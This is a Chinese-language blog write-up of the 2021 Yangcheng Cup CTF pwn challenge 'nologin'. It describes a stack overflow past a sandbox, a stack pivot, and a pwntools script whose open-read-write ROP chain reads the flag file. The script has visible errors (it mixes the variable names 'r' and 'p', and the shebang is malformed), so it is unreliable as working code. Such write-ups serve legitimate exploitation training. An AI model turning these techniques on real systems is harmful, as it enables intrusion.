2021羊城杯 pwn nologin

yongbaoii

于 2021-09-24 01:46:35 发布

阅读量279

点赞数 1

CC 4.0 BY-SA版权

分类专栏： CTF 文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/yongbaoii/article/details/120316904

CTF 专栏收录该内容

213 篇文章

订阅专栏

本文介绍了一个名为nologin的应用程序中的安全漏洞。通过栈溢出攻击，可以绕过沙箱限制并执行任意代码。文章详细解释了如何构造恶意输入以覆盖返回地址，并使用ROP技术调用系统函数读取文件。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

在这里插入图片描述没开canary应该是能溢出

没开NX就是写shellcode

libc是2.27的
在这里插入图片描述

1是user 2是admin
在这里插入图片描述
1的user是一个菜单

2的admin
在这里插入图片描述 admin首先开了沙箱，然后就输入名字。

在这里插入图片描述输入的名字会有一个溢出，溢出可以溢出到上一个admin函数那里，可以多溢出25个字节。

我们只能利用栈迁移，再利用一个read的一半，利用寄存器中残留的值进行输入，然后跳过去就可以了。

exp

#!usr/bin/env python 
#-*- coding:utf8 -*- 
from pwn import * 
 
r = process("./nologin")

r.sendlineafter("input>> \n","2") 

flag_addr = 0x0602020+0x400 
str_addr = 0x0602050 

p.sendlineafter(">password: \n","1"*5+p64(flag_addr)+p64(0x400FF8)) 
p.sendafter("password: \n","a"*0xd+p64(0x4009BC)+"a"*9 ) 
 
read_addr = 0x400780 
open_addr = 0x4007B0 
puts_addr = 0x400730 
p_rdi = 0x401173 
p_rsi_r15 = 0x401171 
p_rdx = 0x6024b0 
 
orw = flat([ 
        p_rdi,flag_addr, 
        p_rsi_r15,0,0, 
        open_addr, 
        p_rdi,4, 
        p_rsi_r15,str_addr,0, 
        p_rdx,0x40, 
        read_addr, 
        p_rdi,str_addr, 
        puts_addr 
]) 
 
r.sendline(("./flag".ljust(8,'\x00')+orw+asm("pop rdx\nret\n")) ) 

r.interactive()